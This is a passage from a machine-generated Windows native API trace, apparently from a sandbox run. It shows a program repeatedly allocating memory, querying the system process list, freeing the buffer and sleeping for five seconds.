ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.064] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.072] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.086] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.109] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.118] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.126] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.137] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.156] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.181] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.220] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 